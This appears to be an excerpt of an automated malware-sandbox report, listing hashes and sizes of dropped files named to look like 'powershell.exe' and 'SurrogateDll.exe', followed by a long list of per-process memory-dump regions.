MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
\agentBrowsersavesRefBroker\SurrogateDll.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
\agentBrowsersavesRefBroker\SurrogateDll.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
memory/112-167-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/112-88-0x0000000000000000-mapping.dmp

Download
memory/112-181-0x00000000029B4000-0x00000000029B7000-memory.dmp

Filesize
12KB

Download
memory/112-147-0x00000000029B4000-0x00000000029B7000-memory.dmp

Filesize
12KB

Download
memory/112-182-0x00000000029BB000-0x00000000029DA000-memory.dmp

Filesize
124KB

Download
memory/112-163-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/112-132-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/748-227-0x0000000000000000-mapping.dmp

Download
memory/772-184-0x00000000028EB000-0x000000000290A000-memory.dmp

Filesize
124KB

Download
memory/772-168-0x000000001B880000-0x000000001BB7F000-memory.dmp

Filesize
3.0MB

Download
memory/772-138-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/772-87-0x0000000000000000-mapping.dmp

Download
memory/772-144-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/772-185-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/772-141-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/864-231-0x0000000000000000-mapping.dmp

Download
memory/864-234-0x0000000000050000-0x0000000000210000-memory.dmp

Filesize
1.8MB

Download
memory/908-106-0x0000000000000000-mapping.dmp

Download
memory/908-152-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/908-186-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/908-169-0x000000001B830000-0x000000001BB2F000-memory.dmp

Filesize
3.0MB

Download
memory/908-164-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/908-139-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/908-187-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/996-55-0x0000000000000000-mapping.dmp

Download
memory/1012-200-0x00000000025FB000-0x000000000261A000-memory.dmp

Filesize
124KB

Download
memory/1012-193-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1012-142-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1012-96-0x0000000000000000-mapping.dmp

Download
memory/1012-170-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

Filesize
3.0MB

Download
memory/1012-135-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1012-145-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1336-59-0x0000000000000000-mapping.dmp

Download
memory/1380-86-0x0000000000000000-mapping.dmp

Download
memory/1380-149-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/1380-157-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1380-166-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/1380-179-0x000000000250B000-0x000000000252A000-memory.dmp

Filesize
124KB

Download
memory/1380-178-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/1380-105-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1456-137-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1456-94-0x0000000000000000-mapping.dmp

Download
memory/1456-199-0x000000000284B000-0x000000000286A000-memory.dmp

Filesize
124KB

Download
memory/1456-192-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/1456-155-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/1456-161-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1472-112-0x0000000000000000-mapping.dmp

Download
memory/1472-226-0x0000000000000000-mapping.dmp

Download
memory/1512-83-0x0000000000000000-mapping.dmp

Download
memory/1532-183-0x000000000282B000-0x000000000284A000-memory.dmp

Filesize
124KB

Download
memory/1532-154-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1532-103-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1532-180-0x0000000002824000-0x0000000002827000-memory.dmp

Filesize
12KB

Download
memory/1532-176-0x000000000282B000-0x000000000284A000-memory.dmp

Filesize
124KB

Download
memory/1532-151-0x0000000002824000-0x0000000002827000-memory.dmp

Filesize
12KB

Download
memory/1532-165-0x000000001BA60000-0x000000001BD5F000-memory.dmp

Filesize
3.0MB

Download
memory/1532-81-0x0000000000000000-mapping.dmp

Download
memory/1588-67-0x00000000001C0000-0x00000000001C8000-memory.dmp

Filesize
32KB

Download
memory/1588-74-0x00000000009B0000-0x00000000009BC000-memory.dmp

Filesize
48KB

Download
memory/1588-122-0x000000001B246000-0x000000001B265000-memory.dmp

Filesize
124KB

Download
memory/1588-80-0x000000001B246000-0x000000001B265000-memory.dmp

Filesize
124KB

Download
memory/1588-66-0x0000000000350000-0x000000000036C000-memory.dmp

Filesize
112KB

Download
memory/1588-65-0x0000000000AD0000-0x0000000000C90000-memory.dmp

Filesize
1.8MB

Download
memory/1588-63-0x0000000000000000-mapping.dmp

Download
memory/1588-79-0x0000000000A80000-0x0000000000A8C000-memory.dmp

Filesize
48KB

Download
memory/1588-68-0x0000000000370000-0x0000000000380000-memory.dmp

Filesize
64KB

Download
memory/1588-78-0x0000000000A60000-0x0000000000A6C000-memory.dmp

Filesize
48KB

Download
memory/1588-69-0x0000000000490000-0x00000000004A6000-memory.dmp

Filesize
88KB

Download
memory/1588-70-0x00000000004B0000-0x00000000004C0000-memory.dmp

Filesize
64KB

Download
memory/1588-77-0x0000000000A50000-0x0000000000A58000-memory.dmp

Filesize
32KB

Download
memory/1588-76-0x00000000009C0000-0x00000000009CE000-memory.dmp

Filesize
56KB

Download
memory/1588-71-0x00000000004C0000-0x00000000004CC000-memory.dmp

Filesize
48KB

Download
memory/1588-72-0x00000000004D0000-0x00000000004D8000-memory.dmp

Filesize
32KB

Download
memory/1588-109-0x000000001B246000-0x000000001B265000-memory.dmp

Filesize
124KB

Download
memory/1588-75-0x0000000000A70000-0x0000000000A7A000-memory.dmp

Filesize
40KB

Download
memory/1588-73-0x00000000004E0000-0x00000000004F2000-memory.dmp

Filesize
72KB

Download
memory/1676-189-0x00000000024DB000-0x00000000024FA000-memory.dmp

Filesize
124KB

Download
memory/1676-159-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1676-171-0x000000001B9B0000-0x000000001BCAF000-memory.dmp

Filesize
3.0MB

Download
memory/1676-153-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/1676-196-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/1676-84-0x0000000000000000-mapping.dmp

Download
memory/1676-136-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1780-162-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1780-156-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/1780-188-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/1780-195-0x000000000249B000-0x00000000024BA000-memory.dmp

Filesize
124KB

Download
memory/1780-172-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1780-82-0x0000000000000000-mapping.dmp

Download
memory/1780-133-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1780-90-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

Filesize
8KB

Download
memory/1796-148-0x00000000026E4000-0x00000000026E7000-memory.dmp

Filesize
12KB

Download
memory/1796-191-0x00000000026E4000-0x00000000026E7000-memory.dmp

Filesize
12KB

Download
memory/1796-175-0x000000001B8B0000-0x000000001BBAF000-memory.dmp

Filesize
3.0MB

Download
memory/1796-198-0x00000000026EB000-0x000000000270A000-memory.dmp

Filesize
124KB

Download
memory/1796-160-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1796-85-0x0000000000000000-mapping.dmp

Download
memory/1796-130-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1832-54-0x00000000751A1000-0x00000000751A3000-memory.dmp

Filesize
8KB

Download
memory/1872-143-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1872-100-0x0000000000000000-mapping.dmp

Download
memory/1872-146-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/1872-173-0x000000001B7C0000-0x000000001BABF000-memory.dmp

Filesize
3.0MB

Download
memory/1872-197-0x000000000261B000-0x000000000263A000-memory.dmp

Filesize
124KB

Download
memory/1872-134-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1872-190-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/1980-222-0x0000000000000000-mapping.dmp

Download
memory/1992-131-0x000007FEEAD80000-0x000007FEEB7A3000-memory.dmp

Filesize
10.1MB

Download
memory/1992-158-0x000007FEE9250000-0x000007FEE9DAD000-memory.dmp

Filesize
11.4MB

Download
memory/1992-150-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1992-202-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/1992-194-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1992-102-0x0000000000000000-mapping.dmp

Download
memory/1992-174-0x000000001B9F0000-0x000000001BCEF000-memory.dmp

Filesize
3.0MB

Download
memory/1992-201-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/2116-223-0x0000000000000000-mapping.dmp

Download
memory/2200-124-0x0000000000000000-mapping.dmp

Download
memory/2224-127-0x0000000001340000-0x0000000001500000-memory.dmp

Filesize
1.8MB

Download
memory/2224-140-0x000000001ACB6000-0x000000001ACD5000-memory.dmp

Filesize
124KB

Download
memory/2224-125-0x0000000000000000-mapping.dmp

Download
memory/2224-129-0x000000001ACB6000-0x000000001ACD5000-memory.dmp

Filesize
124KB

Download
memory/2224-235-0x000000001ACB6000-0x000000001ACD5000-memory.dmp

Filesize
124KB

Download
memory/2224-128-0x0000000000B10000-0x0000000000B22000-memory.dmp

Filesize
72KB

Download
memory/2604-210-0x0000000000E80000-0x0000000001040000-memory.dmp

Filesize
1.8MB

Download
memory/2604-204-0x0000000000000000-mapping.dmp

Download
memory/2756-203-0x0000000000000000-mapping.dmp

Download
memory/2832-209-0x0000000000000000-mapping.dmp

Download
memory/2876-206-0x0000000000000000-mapping.dmp

Download
memory/2884-211-0x0000000000000000-mapping.dmp

Download
memory/2928-214-0x0000000000000000-mapping.dmp

Download
memory/3028-215-0x0000000000000000-mapping.dmp

Download
memory/3052-218-0x0000000000000000-mapping.dmp

Download
memory/3068-219-0x0000000000000000-mapping.dmp

Download